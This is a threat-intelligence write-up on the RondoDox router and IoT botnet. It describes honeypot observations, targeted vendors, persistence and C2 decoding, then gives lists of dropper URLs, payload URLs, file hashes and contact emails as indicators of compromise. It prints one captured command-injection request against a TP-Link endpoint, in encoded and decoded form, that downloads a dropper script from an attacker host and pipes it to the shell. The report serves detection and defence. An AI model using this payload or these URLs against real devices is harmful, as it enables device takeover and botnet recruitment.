The RondoDox botnet is a network of compromised Internet-connected devices, including MIPS-based embedded systems such as routers and IoT devices. Our honeypot data has observed attempts by RondoDox to compromise systems, demonstrating exploitation of vulnerabilities or weak credentials to gain control over devices that can then be used for activities like DDoS attacks, spam campaigns, credential stuffing, or illicit cryptocurrency mining. Since June 2025, Sicehice has seen an uptick in exploitation of common router CVEs that lead to RondoDox botnet infections. The malware itself infects the target device with a dropper-like shell script which facilitates the download of a final stage payload.
Sicehice observed the first evidence of RondoDox as early as 2025-06-04 02:43:31. The following source IP addresses are the origination point of the activity:
We note that the two IP addresses are in the same /24 subnet. Looking at other IPs involved in exploitation activity from the same subnet, several additional IP addresses of interest appear. Although none of these IPs are confirmed to be RondoDox, the patterns show an organized effort where the threat actor operates from IP addresses in AS 51396 (Pfcloud UG):
The following request is an example the rondo.sh dropper being downloaded from 45.8.145.203 and subsequently executed:
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink.8080%3B%29
Decoded: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall -9 mipsel mpsl;(wget -O- http://45.8.145.203/rondo.sh||busybox wget -O- http://45.8.145.203/rondo.sh||curl http://45.8.145.203/rondo.sh) | sh -s tplink.8080;)
In our payload captures, we have seen RondoDox targeting various router manufacturers, including but not limited to: Dasan, ZyXEL, Four-Faith, LB-Link, TP-Link, NETGEAR, D-Link, and Linksys. While the dropper scripts exist in many forms and appear to be targeted at the various router manufacturers, below is a screenshot of a generic RondoDox dropper shell script:
Once the dropper is executed, a final stage payload is downloaded for the target system’s architecture. Fortinet previously published a great article on RondoDox where we note the same C2 by using the XOR key “rondo” to decode the C2 address:
While the sample detailed by Fortinet has the same C2, we also observed other samples that have a different contact email address (bang2012@protonmail.com) listed under /tmp/contact.txt:
For persistence, we see /etc/init.d/rondo being created to include a startup script that allows the malware to run at boot:
We have identified the following products and associated CVEs being targeted by RondoDox:
Indicators of Compromise
IOCs gathered from our honeypots have also been added to a VirusTotal Collection.
Dropper URLs:
http://38.59.219.27/rondo.eir.sh
http://38.59.219.27/rondo.gpon.sh
http://169.255.72.169/rondo.sh
http://38.59.219.27/rondo.trueonline.sh
http://38.59.219.27/rondo.linksys.sh
http://78.153.149.90/rondo.mipsel
http://38.59.219.27/rondo.lblink.sh
http://154.91.254.95/rondo.mipsel
http://38.59.219.27/rondo.jaws.sh
http://38.59.219.27/rondo.dlink.sh
http://14.103.145.202/rondo.sh
http://14.103.145.211/rondo.sh
http://37.32.15.8/rondo.sh
http://38.59.219.27/rondo.tplink.sh
http://45.8.145.203/rondo.sh
http://38.59.219.27/rondo.avtech.sh
http://38.59.219.27/rondo.tbk.sh
http://38.59.219.27/rondo.dlink.sh
http://38.59.219.27/rondo.netgear.sh
http://38.59.219.27/rondo.lol
http://38.59.219.27/rondo.netgearcgi.sh
http://38.59.219.27/rondo.tr.sh
Payload URLs:
http://154.91.254.95/rondo.mips
http://45.8.145.203/rondo.mipsel
http://45.8.145.203/rondo.mips
http://45.8.145.203/rondo.x86_64
http://45.8.145.203/rondo.armv4l
http://45.8.145.203/rondo.armv5l
http://45.8.145.203/rondo.armv6l
http://45.8.145.203/rondo.armv7l
http://45.8.145.203/rondo.powerpc
http://45.8.145.203/rondo.powerpc-440fp
http://45.8.145.203/rondo.i686
http://45.8.145.203/rondo.i586
http://45.8.145.203/rondo.i486
http://45.8.145.203/rondo.fbsdamd64
http://45.8.145.203/rondo.fbsdi386
http://45.8.145.203/rondo.fbsdpowerpc
http://45.8.145.203/rondo.fbsdarm64
http://45.8.145.203/rondo.arc700
http://45.8.145.203/rondo.sh4
http://45.8.145.203/rondo.sparc
http://45.8.145.203/rondo.m68k
IP Addresses:
Hashes:
3fd6d20d5639dd4bf04b2cf229a547a7ba2d1daf90efafb43ca94ac8007fd4c9
0034fc44a680a82c0eb4363f4518ae440762e01be889578cb7c97b95addcb7a4
0afe0aa708c4c4ea25f9a469a966131e71ee4577b0565907506ec95de706c7fa
20d7381289a69bf1ac872115966c077a0ddc051cdaa471f84c3de001730fc329
2e50ce7e9006e54230f1f4a41834c9f399d4827c76adac7856ec886bbaee74e2
30b920be901552efe10e1a31aa0bcf1cc1a6d80362a05b18f389e50d708a820f
4936b3dcd458b3f456a70d0bfaaf65e0fe2ebff1ceb7749d99728383252cd6ff
4d65dab6ddb631b0cd6ef02ae2cb27074a3fff5ac994040e7da7e33d7f29e1ce
4faf724e04f2f99bebda866ae0524daac68a4fd39978cd184f0d0e220089338a
51aaeaee8247d57cc00eda44eff6cbdb6cf34106f14c2f4fc8aeb07e57ac9182
53ee0597b17f04e64c13610d197a01c9c77b1f9091469e2791ac0f50d00589ec
73d874fd4a47cc0f87a018abfeff6d95a0b44c92aac7b0e167f362faebf27ae5
7562196faa42a7b48025e23cbf339fb037fc113a7865fdfb7a1e046d35fc31af
790c702a2a0555ad5e2247529bea874a13b54f7c110eafa983812875de5c7c8a
9d715717f22571f1f1e0ab1fb7e4aec3f51518eac3836b34cad802a2e7c6618b
c208e4dab23f467b8f819c87425f6c447572958aa3213d7700378eb3fec4ed5a
e9546bfe823ae24c15943d4e172ea10c02f8b605f60670bf41e5c057d4a19ccc
f5ae13a01b9c45aa255a6203cc6d1258114979f37c187c42ec40aa5f131a0ae4
001743bbcfc3805b1f865fe5bb533743e455bc2252606f2e8ab86d8e625b34ed
69b7b0f6c1cbe388d99be2e66b72cee9ca51558b4c6f389b8748a0b2afa572d1
7fb1e4a7d4d96ae8404aebbf077676508b2e5f84a70a97d30fc3a2db332f0d8c
c9e816f9ba0c1d014d9b236cd36856b1bfb45773c81a8ea8d13be6b69df8310f
7baae9268ad6cbb10796e512aee8492563ae51de51419b07070d9f304ef2d4fb
73b76e823102234976582ab15c8176e2774b82f1f0c210667cb062803ae35110
9efcfcd7077971b27a20641ad07190fd35b5b556ed1a8c11ab464b292172b584
1d3ef63acfa182090031dc46778115c1aa02c0275d28ff5075e5d530c6c58eeb
9c48fc8f842c8303b2e81ad3e23689d6671fdf4031028dd0b6bfdcabd69952e1
02b8e42bd9a5e3d1901778efaf5d77379d5f552fdce6339c16d924e6979a4a71
0772e696320efd1a16d6e2d93aa3f017c6f9f65e94973705dd53add1b077154f
baf28acbcf119f97b8207af98e70f36d24ae79d804d09c1f2babe0de64d7734e
03195acd014251078307590378cc5f7f60e1ca3a36cd3b6b8c3ad246bb32fa8f
d8dacd72670db9408a58d3940f2181dbcbebd21e1745c78814493af86a4cfcef
56c2a58c3c496658e5d5f40797ba60bf4780b5f7c24c03c079a63f21866ce621
5bc8cbc0f2ad8000925becde0cdbdb27edaf29ab25e7c2aedb01cb4af517876a
61d68150b621cae25a384bee94fca8cd694ad301dd66da599549769b0351446b
d90e3e5d4ee6f117c3e12cf347de4c8fb93213c0bbe7997c517a46e7f1300043
b01e2a0b1f3ab9583a8e7a521443043adf414ecfdfa1caf21f82e24db59c7148
f23f75ce80d11f4b0c1a2db424b18c1599d8f653b0c1e3c2872864d20963b1bd
0007753861fb69c10422b231e0936ce160ccae376283468d418896e101428ea8
08519b74c9a3473f819f1dbd64834a370b2e98a0928c2511f2ef285e969c24f2
d7fb0101fdd546b0cfffb58d966aa89b67ae390f2a6df67717c6e10249c30aae
7ee0b668fc285da89a5c614255235383abc4efba2d91068586e22fa148371283
bd658bb0838715790742595fe1f1d0434a8da3dfabaa425c83f93a057e7ac117
4e610155e467f6558f2b7932a56e8b9a468ccc5f0ce27436775918bb0d04d17c
73b76e823102234976582ab15c8176e2774b82f1f0c210667cb062803ae35110
9efcfcd7077971b27a20641ad07190fd35b5b556ed1a8c11ab464b292172b584
1d3ef63acfa182090031dc46778115c1aa02c0275d28ff5075e5d530c6c58eeb
9c48fc8f842c8303b2e81ad3e23689d6671fdf4031028dd0b6bfdcabd69952e1
cec824ab28382492bc235995df23dbf0b81d01094b18c24e4f4dbe802bf96c49
b9d5eba1c7d8211c0dcaaf6f6bf4cf2fa5f4db503d40483fca70496a056f9f7b
e0956d116efc1865e1ec9720686696c88ad4296dec34a397d5c81c05831d759e
db51cdb7ad9b996b89dee1a188c14497acbbafee528f42d22fb5cccf3118ecd9
b003558a360ba3f43fb4202a05dbb0398443de6456b1f1537a4d5f4eabd1edef
7f15a708d741f589a9bcfcc334e1c6b54361117ff2d35956cd9ea4cce81ae3af
d93c04a7d0fb1b3e842bc9356ff4b4ada61c733071733ee21861423c092ed6f2
bd1bd6a9f37a3439d3615e2cb66cbc3b1b0b97797253a7d1ddfe005d1dd8d0c6
547255b76fa3f353eac1dd217beeaae12ab1cd0bd93e27614f352cab91ad46fc
eb2290ee4b876b8163f4f7bbe3e516d14f0ea4481f7e6865376e2bea32f40a16
ac8bd1bea0e83594634e5a306db9c72572d320bdd05fd14a738f1c12c0e6417c
f39f03bd5e699109a36a401f97b28d018c42471925ee31113718927265fbe208
27f3d4c5f1976ca46d7c3c59126bbff8c830ae8d5d4d7d57f5331b10e896edbd
17437f3b6c0392a028b98be3d444214be768701e159f14d27f149fd83e9b83f6
200a19acab235a0bfc3a29c4a3ce7a8c5161b50e2cdb114214edb1b5b732a57f
1ce7abdd84e3b0257f3b0bc94840102e5ec4656653e6787cde9f19759f4e1d1b
8c13fa76c638605ebf1f6fb3daf56c82f46c33c38c5b1de97a165ff24b58a3cd
9c8a2e8bbe3e60a2aef4f60db70289c148bb78f9caa1f888ac842b01f259793e
859003f77aef6dc42b48fb8d47d0925017f99e258eafcc6869e790037b8c15e1
91d1b3fc5a83375935e55d9fb361e164e39f007aecb52e40318af1f8aea08493
7db37d544c3024a6d45811d392e7af39758da215ba0b1d710ebfb9b8927a21b8
a3f8251498ae22abeec5e4ec9fdef4b0aa1267e2ad7974175ec2836e5d58969c
fe629f765c8bd1e1cbf1219a84509b87abb611550827d019a9954a9df1a480e9
e2f94b0b0e2832d6b06e0838fbf7a5b1f1c46e3aef64fe1140e513101d172e1e
7f28d9922662307156b5d5cd1c217e724a23466bab5bb03bd29f098b7e8251b0
7eb28f8435f8eb1e1c942c0524e9f3e88a0a17c6216792d3e0da1265eadf8cd6
2b1eaebc35398cbeab8a5b030ed415f4e2dcd8fd3cd204dcd1b0b1138cf6ece4
42b0e1d9ed68abba7a95872680029f336c792d131a630d8c92cc273e12f6af1d
90cefb4342d4310564242d71a9457c5e27548c2b5a804b0483d6cc62174c4045
d6078e57d823ddbed6fc6a67a867f72f33b934da42788f61f45e454b34dcad59
3b9d5c5031345255075e97b49edf9a6caff3144a142693cf63fd27faf8b98445
001743bbcfc3805b1f865fe5bb533743e455bc2252606f2e8ab86d8e625b34ed
69b7b0f6c1cbe388d99be2e66b72cee9ca51558b4c6f389b8748a0b2afa572d1
7fb1e4a7d4d96ae8404aebbf077676508b2e5f84a70a97d30fc3a2db332f0d8c
c9e816f9ba0c1d014d9b236cd36856b1bfb45773c81a8ea8d13be6b69df8310f
7baae9268ad6cbb10796e512aee8492563ae51de51419b07070d9f304ef2d4fb
73b76e823102234976582ab15c8176e2774b82f1f0c210667cb062803ae35110
9efcfcd7077971b27a20641ad07190fd35b5b556ed1a8c11ab464b292172b584
1d3ef63acfa182090031dc46778115c1aa02c0275d28ff5075e5d530c6c58eeb
9c48fc8f842c8303b2e81ad3e23689d6671fdf4031028dd0b6bfdcabd69952e1
02b8e42bd9a5e3d1901778efaf5d77379d5f552fdce6339c16d924e6979a4a71
0772e696320efd1a16d6e2d93aa3f017c6f9f65e94973705dd53add1b077154f
baf28acbcf119f97b8207af98e70f36d24ae79d804d09c1f2babe0de64d7734e
03195acd014251078307590378cc5f7f60e1ca3a36cd3b6b8c3ad246bb32fa8f
d8dacd72670db9408a58d3940f2181dbcbebd21e1745c78814493af86a4cfcef
56c2a58c3c496658e5d5f40797ba60bf4780b5f7c24c03c079a63f21866ce621
5bc8cbc0f2ad8000925becde0cdbdb27edaf29ab25e7c2aedb01cb4af517876a
61d68150b621cae25a384bee94fca8cd694ad301dd66da599549769b0351446b
d90e3e5d4ee6f117c3e12cf347de4c8fb93213c0bbe7997c517a46e7f1300043
b01e2a0b1f3ab9583a8e7a521443043adf414ecfdfa1caf21f82e24db59c7148
f23f75ce80d11f4b0c1a2db424b18c1599d8f653b0c1e3c2872864d20963b1bd
Emails:
bang2012@protonmail.com
vanillabotnet@protonmail.com